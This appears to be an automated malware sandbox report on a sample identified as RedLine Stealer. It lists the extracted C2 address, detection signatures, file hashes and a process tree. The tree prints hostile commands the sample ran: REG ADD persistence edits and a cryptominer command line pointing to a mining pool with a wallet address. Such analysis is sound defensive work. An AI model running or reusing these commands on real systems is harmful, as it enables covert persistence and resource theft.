Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
153s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220331-en -
submitted
12/04/2022, 07:38
Static task
static1
Behavioral task
behavioral1
Sample
a9d9617466a30b874b80d4fd6465f46b.exe
Resource
win7-20220331-en
General
-
Target
a9d9617466a30b874b80d4fd6465f46b.exe
-
Size
233KB
-
MD5
a9d9617466a30b874b80d4fd6465f46b
-
SHA1
b6e42e3a1fbc20c78e003b065440733fb1cafe84
-
SHA256
15791f0ceae7a162d3280af791cd8837705a7ccb6248bbfc3184cc3306ec4a57
-
SHA512
ec3d90e3c7b9427ecb9097941a37872c195cc389bf45a78b7c343d7d964fcf999266cee8bea78907cb302d318b74035948b7db760903692e4275d5016d3e1c89
Malware Config
Extracted
redline
123
188.68.205.12:7053
-
auth_value
cba3087b3c1a6a9c43b3f96591452ea2
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral2/files/0x0006000000021e3b-125.dat family_redline behavioral2/files/0x0006000000021e3b-126.dat family_redline behavioral2/memory/3560-131-0x0000000000090000-0x00000000000B0000-memory.dmp family_redline -
suricata: ET MALWARE CerberTear Ransomware CnC Checkin
suricata: ET MALWARE CerberTear Ransomware CnC Checkin
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
LoaderBot executable 3 IoCs
resource yara_rule behavioral2/files/0x0007000000021e54-162.dat loaderbot behavioral2/files/0x0007000000021e54-163.dat loaderbot behavioral2/memory/1324-164-0x0000000000AC0000-0x0000000000EC0000-memory.dmp loaderbot -
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
pid Process 3560 M3gJNbpqWpct.exe 4488 BEgHvre3gJNc.exe 2788 0fcffa63.exe 5068 ae2a67f923fc30cc.exe 1324 MinerFull.exe 3948 Driver.exe 4120 Driver.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000\Control Panel\International\Geo\Nation ae2a67f923fc30cc.exe Key value queried \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000\Control Panel\International\Geo\Nation MinerFull.exe Key value queried \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000\Control Panel\International\Geo\Nation a9d9617466a30b874b80d4fd6465f46b.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\MinerFull.exe" MinerFull.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 checkip.amazonaws.com 96 ipinfo.io 97 ipinfo.io 101 ip-api.com 103 checkip.amazonaws.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 3816 3948 WerFault.exe 108 -
Delays execution with timeout.exe 1 IoCs
pid Process 4468 timeout.exe -
Suspicious behavior: EnumeratesProcesses 46 IoCs
pid Process 3560 M3gJNbpqWpct.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe 1324 MinerFull.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 652 Process not Found -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 4488 BEgHvre3gJNc.exe Token: SeDebugPrivilege 3560 M3gJNbpqWpct.exe Token: SeDebugPrivilege 2788 0fcffa63.exe Token: SeDebugPrivilege 5068 ae2a67f923fc30cc.exe Token: SeDebugPrivilege 1324 MinerFull.exe Token: SeLockMemoryPrivilege 3948 Driver.exe Token: SeLockMemoryPrivilege 3948 Driver.exe Token: SeLockMemoryPrivilege 4120 Driver.exe Token: SeLockMemoryPrivilege 4120 Driver.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 3132 wrote to memory of 3560 3132 a9d9617466a30b874b80d4fd6465f46b.exe 82 PID 3132 wrote to memory of 3560 3132 a9d9617466a30b874b80d4fd6465f46b.exe 82 PID 3132 wrote to memory of 3560 3132 a9d9617466a30b874b80d4fd6465f46b.exe 82 PID 3132 wrote to memory of 4488 3132 a9d9617466a30b874b80d4fd6465f46b.exe 83 PID 3132 wrote to memory of 4488 3132 a9d9617466a30b874b80d4fd6465f46b.exe 83 PID 4488 wrote to memory of 4828 4488 BEgHvre3gJNc.exe 100 PID 4488 wrote to memory of 4828 4488 BEgHvre3gJNc.exe 100 PID 4828 wrote to memory of 5044 4828 cmd.exe 102 PID 4828 wrote to memory of 5044 4828 cmd.exe 102 PID 4828 wrote to memory of 4468 4828 cmd.exe 103 PID 4828 wrote to memory of 4468 4828 cmd.exe 103 PID 4828 wrote to memory of 2788 4828 cmd.exe 104 PID 4828 wrote to memory of 2788 4828 cmd.exe 104 PID 2788 wrote to memory of 5068 2788 0fcffa63.exe 105 PID 2788 wrote to memory of 5068 2788 0fcffa63.exe 105 PID 5068 wrote to memory of 1324 5068 ae2a67f923fc30cc.exe 107 PID 5068 wrote to memory of 1324 5068 ae2a67f923fc30cc.exe 107 PID 5068 wrote to memory of 1324 5068 ae2a67f923fc30cc.exe 107 PID 1324 wrote to memory of 3948 1324 MinerFull.exe 108 PID 1324 wrote to memory of 3948 1324 MinerFull.exe 108 PID 1324 wrote to memory of 4120 1324 MinerFull.exe 113 PID 1324 wrote to memory of 4120 1324 MinerFull.exe 113
Processes
-
C:\Users\Admin\AppData\Local\Temp\a9d9617466a30b874b80d4fd6465f46b.exe"C:\Users\Admin\AppData\Local\Temp\a9d9617466a30b874b80d4fd6465f46b.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Users\Public\M3gJNbpqWpct.exe"C:\Users\Public\M3gJNbpqWpct.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3560
-
-
C:\Users\Public\BEgHvre3gJNc.exe"C:\Users\Public\BEgHvre3gJNc.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp405F.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d "C:\ProgramData\Connector Protection v1.5.0"4⤵PID:5044
-
-
C:\Windows\system32\timeout.exetimeout 44⤵
- Delays execution with timeout.exe
PID:4468
-
-
C:\ProgramData\Connector Protection v1.5.0\0fcffa63.exe"C:\ProgramData\Connector Protection v1.5.0\0fcffa63.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Users\Admin\AppData\Local\Temp\ae2a67f923fc30cc.exe"C:\Users\Admin\AppData\Local\Temp\ae2a67f923fc30cc.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\ProgramData\MinerFull.exe"C:\ProgramData\MinerFull.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 45XQiu9A9vmVd5Cy6X35M12NocUr2Hx69X4ZNNu2BsKJYkdksefg2gXJyvBUeEJyDWTfLD6GWmAu4Tab1w4tycfcFMqy8yH -p x -k -v=0 --donate-level=1 -t 17⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3948 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3948 -s 7608⤵
- Program crash
PID:3816
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 45XQiu9A9vmVd5Cy6X35M12NocUr2Hx69X4ZNNu2BsKJYkdksefg2gXJyvBUeEJyDWTfLD6GWmAu4Tab1w4tycfcFMqy8yH -p x -k -v=0 --donate-level=1 -t 17⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4120
-
-
-
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 420 -p 3948 -ip 39481⤵PID:3272
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
42KB
MD5c523d423234494eeb7b60a892d7a4bea
SHA1db992908237ee2ab5c07f4362b9a29516ac09a5d
SHA25698c0617a52694e05760b7f0584a3a0f15f772a4e8598cdd7bd833401e6c596d3
SHA5120aa6808037697dfd7654a845008e9ee231b05e55a2aa5cb2984a060cc6100d4e7ced45483f832d37bde1adad99facf03b17e6a9268a26ed9b9ced1fa389a81ec
-
Filesize
42KB
MD5c523d423234494eeb7b60a892d7a4bea
SHA1db992908237ee2ab5c07f4362b9a29516ac09a5d
SHA25698c0617a52694e05760b7f0584a3a0f15f772a4e8598cdd7bd833401e6c596d3
SHA5120aa6808037697dfd7654a845008e9ee231b05e55a2aa5cb2984a060cc6100d4e7ced45483f832d37bde1adad99facf03b17e6a9268a26ed9b9ced1fa389a81ec
-
Filesize
4.0MB
MD55c7bc4cc56f6e6acb801210bc6eda798
SHA1541b6f50091fdc17c2bc8d596c0e202b854fb991
SHA25648f66e13c00038bb2ec12a58bd34cb79f2cf616230c25224c68b81d6c3d7ebf9
SHA51266558bf8679c264c507a1fb8da2fd81347b339d3786487895f902330d63bf9b44be5a136061b0848801b768fea3e525b934d1b04c2cef959cc878b421c6cbd5d
-
Filesize
4.0MB
MD55c7bc4cc56f6e6acb801210bc6eda798
SHA1541b6f50091fdc17c2bc8d596c0e202b854fb991
SHA25648f66e13c00038bb2ec12a58bd34cb79f2cf616230c25224c68b81d6c3d7ebf9
SHA51266558bf8679c264c507a1fb8da2fd81347b339d3786487895f902330d63bf9b44be5a136061b0848801b768fea3e525b934d1b04c2cef959cc878b421c6cbd5d
-
Filesize
4.6MB
MD5037641cac20d9692868f0bc39282f611
SHA14458ded6b1f5d3002d5594fe667ad867f9d5ed5e
SHA2564fbdca8e2dd58bf73340aa32542bb45fce19be1fa372393e7571d72a50e24967
SHA5124e1b61a13dbd7ef39b2a2f999eef840126383f33ea5ff6c8208f8060efb21401a531cd8cec761bbf998d77a6f97ea59b513096920a14723022203ef9128d25b1
-
Filesize
4.6MB
MD5037641cac20d9692868f0bc39282f611
SHA14458ded6b1f5d3002d5594fe667ad867f9d5ed5e
SHA2564fbdca8e2dd58bf73340aa32542bb45fce19be1fa372393e7571d72a50e24967
SHA5124e1b61a13dbd7ef39b2a2f999eef840126383f33ea5ff6c8208f8060efb21401a531cd8cec761bbf998d77a6f97ea59b513096920a14723022203ef9128d25b1
-
Filesize
356B
MD540f639fc9193f30e711b924ac6e6b2ca
SHA1005d2d1d125bee51b5b0d98b88c8ad26a0801eb9
SHA25692956a38a5f866dc299100b46b2866875ffefaf156a794b66c52fb7e94343f2d
SHA5123c04c3d25b291cb2be58efb572e43c649e57b7dba9a7039467641f1b1888b21368c03ea0d4afcd731885d938bdbfabd0a3d5deac4f8437ef7751a24bd7387c73
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
42KB
MD5c523d423234494eeb7b60a892d7a4bea
SHA1db992908237ee2ab5c07f4362b9a29516ac09a5d
SHA25698c0617a52694e05760b7f0584a3a0f15f772a4e8598cdd7bd833401e6c596d3
SHA5120aa6808037697dfd7654a845008e9ee231b05e55a2aa5cb2984a060cc6100d4e7ced45483f832d37bde1adad99facf03b17e6a9268a26ed9b9ced1fa389a81ec
-
Filesize
42KB
MD5c523d423234494eeb7b60a892d7a4bea
SHA1db992908237ee2ab5c07f4362b9a29516ac09a5d
SHA25698c0617a52694e05760b7f0584a3a0f15f772a4e8598cdd7bd833401e6c596d3
SHA5120aa6808037697dfd7654a845008e9ee231b05e55a2aa5cb2984a060cc6100d4e7ced45483f832d37bde1adad99facf03b17e6a9268a26ed9b9ced1fa389a81ec
-
Filesize
106KB
MD564eeb5ab677596ec8516a8414428b5d7
SHA14c8e61d0e2abfccb50c9a949d8bcb318b6c5e52a
SHA2562ac567b583c3dc6843f8d7cba45b102b856f269395ee220801c7a490679a53b3
SHA51216012d1985a45256d4978e0506a900ea9c8009530f0068e7870b3ec5b8ba2ebe0eb3542bc28a43eda3a7c1eb4dd2eeae672abb57a9799d51e1db3aa49598c439
-
Filesize
106KB
MD564eeb5ab677596ec8516a8414428b5d7
SHA14c8e61d0e2abfccb50c9a949d8bcb318b6c5e52a
SHA2562ac567b583c3dc6843f8d7cba45b102b856f269395ee220801c7a490679a53b3
SHA51216012d1985a45256d4978e0506a900ea9c8009530f0068e7870b3ec5b8ba2ebe0eb3542bc28a43eda3a7c1eb4dd2eeae672abb57a9799d51e1db3aa49598c439